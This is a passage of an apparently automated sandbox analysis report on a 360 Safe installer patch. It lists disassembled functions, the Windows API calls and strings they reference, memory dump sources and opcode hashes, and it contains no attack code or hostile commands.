                                                                                                                                                                                                              • Instruction ID: 1aa8f49dc4f873a313e916a600e419237a6b5f5f1263e2cc46e435f63859b870
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaa651c84c67cdaf0006de13ce248d88fd34fa91c82c0740b0f3904159a72f28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B516D729146059EEB24CFB8D9816EAB3F4FF08308F20482DD51AC7A41E739E556CFA1
                                                                                                                                                                                                              Function 6BEF7AC1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF7B16
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000004,?,00000008,?,00000004,00000001,00000004,?,00000004,?,00000004), ref: 6BEF7BFA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 6BEF7B37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocGlobal_memset
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
                                                                                                                                                                                                              • API String ID: 2074659453-3418006259
                                                                                                                                                                                                              • Opcode ID: 67119805835566fc6dcf883771bc15cdf7bc03d3e9c21dc646e8ec75a3f9b8f7
                                                                                                                                                                                                              • Instruction ID: 4a94f73b91be9610c043a01d809fbbffe4cb723922dd2b22237151c4ec0d357c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67119805835566fc6dcf883771bc15cdf7bc03d3e9c21dc646e8ec75a3f9b8f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA51D772D002189BCB11DFA0DC91EEE777CEF48704F714169D916AF195EB389A46CBA0
                                                                                                                                                                                                              Function 6BF1998E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF19995
                                                                                                                                                                                                                • Part of subcall function 6BEFB755: __EH_prolog3_GS.LIBCMT ref: 6BEFB75C
                                                                                                                                                                                                                • Part of subcall function 6BEFB755: lstrlenW.KERNEL32(?,0000000C,6BF19D3B,?,?), ref: 6BEFB780
                                                                                                                                                                                                                • Part of subcall function 6BEE84C9: char_traits.LIBCPMT ref: 6BEE84EE
                                                                                                                                                                                                                • Part of subcall function 6BF183A6: _memset.LIBCMT ref: 6BF183C4
                                                                                                                                                                                                                • Part of subcall function 6BF183A6: WideCharToMultiByte.KERNEL32(00000000,00000000,-00000004,000000FF,00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF), ref: 6BF183E5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.%3d] Init disconnected, ERR_HTTP_NOT_INITIALIZED, xrefs: 6BF19AF1
                                                                                                                                                                                                              • [%d.%3d] Init disconnected, ERR_HTTP_INVALID_URL, xrefs: 6BF19A36
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharH_prolog3H_prolog3_MultiWide_memsetchar_traitslstrlen
                                                                                                                                                                                                              • String ID: [%d.%3d] Init disconnected, ERR_HTTP_INVALID_URL$[%d.%3d] Init disconnected, ERR_HTTP_NOT_INITIALIZED
                                                                                                                                                                                                              • API String ID: 2571870572-270683280
                                                                                                                                                                                                              • Opcode ID: 3ec5acd8e2603162733aa5c538b5cd5fedecea08519de2d5c2c57f96358b89fa
                                                                                                                                                                                                              • Instruction ID: a1c055c4b429abeae979a44b8cecde18fd38557e0b5d63cddb16c0170c277540
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec5acd8e2603162733aa5c538b5cd5fedecea08519de2d5c2c57f96358b89fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D651C772500709ABCB15DFB4CC42EEB7BA8EF45314F10491DF466832A0EB38A655C7A1
                                                                                                                                                                                                              Function 6BEE9329 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 6BEE935C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE936A
                                                                                                                                                                                                                • Part of subcall function 6BEE9134: _wcslen.LIBCMT ref: 6BEE913B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] __open_file create file(%s) fail! error code is %d, xrefs: 6BEE9379
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorFileLast_wcslen
                                                                                                                                                                                                              • String ID: [%d.] __open_file create file(%s) fail! error code is %d
                                                                                                                                                                                                              • API String ID: 3865106863-2798064650
                                                                                                                                                                                                              • Opcode ID: abad2d3637c2931cd731457d012f6a984f85dda63890bb97a38d5c25d526daf5
                                                                                                                                                                                                              • Instruction ID: fe13429ed9cbbb0c906be444f35c0e8c766ae61571b5ee74f5b3cbb93451052d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abad2d3637c2931cd731457d012f6a984f85dda63890bb97a38d5c25d526daf5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01F436440204FEEB506F74CC05F9637E8FB15726F118529FA56D51E0E37994968B70
                                                                                                                                                                                                              Function 6BF35F4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF3325B: __EH_prolog3.LIBCMT ref: 6BF33262
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF35F87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountH_prolog3Tick
                                                                                                                                                                                                              • String ID: agt.p.360.cn$tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 3287309161-3328026606
                                                                                                                                                                                                              • Opcode ID: 083410b4fe9b353fd8d127e5f01a3c78753e0b842cec25a7360ab911e7a69293
                                                                                                                                                                                                              • Instruction ID: 96ed89efbc04c7c952590d371571fb70435712c34cff9b64105926a57316288b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 083410b4fe9b353fd8d127e5f01a3c78753e0b842cec25a7360ab911e7a69293
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9F0B4B32103246AD950567A5C91B7B77DDEB96688F00002AFA119A2A0DF6EBC8183B4
                                                                                                                                                                                                              Function 6CD3AD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CD3AD6C
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6CD3AD82
                                                                                                                                                                                                                • Part of subcall function 6CD3AB57: __EH_prolog3.LIBCMT ref: 6CD3AB5E
                                                                                                                                                                                                                • Part of subcall function 6CD3AB57: CreateXMLDOMDocument.SITES(00000000,0000003C,6CD3AD96,?,?,Config\SafeIME.xml), ref: 6CD3AB88
                                                                                                                                                                                                                • Part of subcall function 6CD3AB57: VariantClear.OLEAUT32(?), ref: 6CD3ABD3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClearCombineCreateDocumentH_prolog3PathVariant_memset
                                                                                                                                                                                                              • String ID: Config\SafeIME.xml
                                                                                                                                                                                                              • API String ID: 3506927742-2267017868
                                                                                                                                                                                                              • Opcode ID: 8feb65f3caaa2c1acbffff413f9d79d310073d5b48efad82d7ea3da866ecbbe6
                                                                                                                                                                                                              • Instruction ID: 05120cb25d3f140fa48d5a1951c8851ffff438529749c9d3da04fe913449e185
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8feb65f3caaa2c1acbffff413f9d79d310073d5b48efad82d7ea3da866ecbbe6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61F0A030B0011CABCFA0EF648C45F9DB7F8AB04308F0145A9E189A3280DF75AA0D8BE4
                                                                                                                                                                                                              Function 00B566E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 00B5670E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                              • String ID: EnableUE$Software\360Safe
                                                                                                                                                                                                              • API String ID: 3702945584-3756293347
                                                                                                                                                                                                              • Opcode ID: 2d913026d0e4516f15e27f84375b6161096daa0de999c381b5f37598c3b3f707
                                                                                                                                                                                                              • Instruction ID: a93f4d60a3d29efc4514c784516eab8d76be731901c92a45a423d6f40c836b1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d913026d0e4516f15e27f84375b6161096daa0de999c381b5f37598c3b3f707
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E0ED72E40208FADB00DFA09D45BDEB7FCAB08715F1085B6A516E3190FA74DB44DB51
                                                                                                                                                                                                              Function 6CD89C1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9registryclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegisterClipboardFormatW.USER32(SitesUI), ref: 6CD89C34
                                                                                                                                                                                                              • SmartDisableIME.SITES ref: 6CD89C3F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipboardDisableFormatRegisterSmart
                                                                                                                                                                                                              • String ID: SitesUI
                                                                                                                                                                                                              • API String ID: 3315930252-1048294868
                                                                                                                                                                                                              • Opcode ID: ea832ec7cc2e703cf6ccf6835c011b894cb42da76c525c887aeabec6b832b119
                                                                                                                                                                                                              • Instruction ID: ccb746278221e3671c28ae3ca3421a385e43791c455e2304bf3b705b7886bf3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea832ec7cc2e703cf6ccf6835c011b894cb42da76c525c887aeabec6b832b119
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DED01230B06704CEDB08DF21804C7583675F313715F90841BD04207B50C77F4098AFA1
                                                                                                                                                                                                              Function 00B12860 Relevance: 4.8, APIs: 3, Instructions: 286COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B128B3
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00B129B5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 00B129C5
                                                                                                                                                                                                                • Part of subcall function 00B15690: _malloc.LIBCMT ref: 00B1569C
                                                                                                                                                                                                                • Part of subcall function 00B15690: SetLastError.KERNEL32(00000008,00000000,00B1291E,00000000,00002000,?,00000000), ref: 00B156AE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_malloc$_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1834304950-0
                                                                                                                                                                                                              • Opcode ID: 1381fcfd8481e2640b768e21ca8730fb5a61f91f4c5cc1fb755a06a0f86dbcb9
                                                                                                                                                                                                              • Instruction ID: 689a56de9e6c39b29f9dfaa9dc3e3c39cd38b77e6b9883612b9bf1751bffefe4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1381fcfd8481e2640b768e21ca8730fb5a61f91f4c5cc1fb755a06a0f86dbcb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04B167B19083018BD720DF29C481BABB7E4FF88744F84496DF99987251E770E999CB93
                                                                                                                                                                                                              Function 00B14CB0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B14CF6
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B14D13
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B14D98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Pointer$Read
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2010065189-0
                                                                                                                                                                                                              • Opcode ID: d24ca40465d28c119a35ae76d153f54fc4511cba12be962405859a438f50fc21
                                                                                                                                                                                                              • Instruction ID: ff94f6e4b6d943d18a949a23b7b7116953258cd744b92e01ece645f30a84a296
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d24ca40465d28c119a35ae76d153f54fc4511cba12be962405859a438f50fc21
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C314A706083029BD710DF14E981AABB7E9FB88B44F8009ADF59597290EB70DD84CB93
                                                                                                                                                                                                              Function 6BEF6F32 Relevance: 4.6, APIs: 3, Instructions: 104COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcsncpy$_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4291556967-0
                                                                                                                                                                                                              • Opcode ID: b980625705f079460af43368fe3004c27b0c5318db30952fe517177f7afb8c3b
                                                                                                                                                                                                              • Instruction ID: c8918ee0370adfffd3f2476aa8d2126154e87a623a17606cdc4c63184a68d55d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b980625705f079460af43368fe3004c27b0c5318db30952fe517177f7afb8c3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231507260055A9FDB25CEB4CC55AEEB3BCAF48348F10443EE519C7241EF3996098BA0
                                                                                                                                                                                                              Function 00B787F5 Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B78838
                                                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00B78845
                                                                                                                                                                                                                • Part of subcall function 00B9EDC6: __wsplitpath_helper.LIBCMT ref: 00B9EE08
                                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B78874
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1401654830-0
                                                                                                                                                                                                              • Opcode ID: 4111cb026871a1b885cd2123762c3e24a278ff08836297b45b96318df6df4cc3
                                                                                                                                                                                                              • Instruction ID: c7760ded585dbd49f068d4ceffd897e6b2d39063f017f4e27edfe971d38a2493
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4111cb026871a1b885cd2123762c3e24a278ff08836297b45b96318df6df4cc3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3921CC7291030C9FDB61DFE8DC859EEB7FDEF09304F11456AA519AB201EB30A905CB51
                                                                                                                                                                                                              Function 6BF26C30 Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
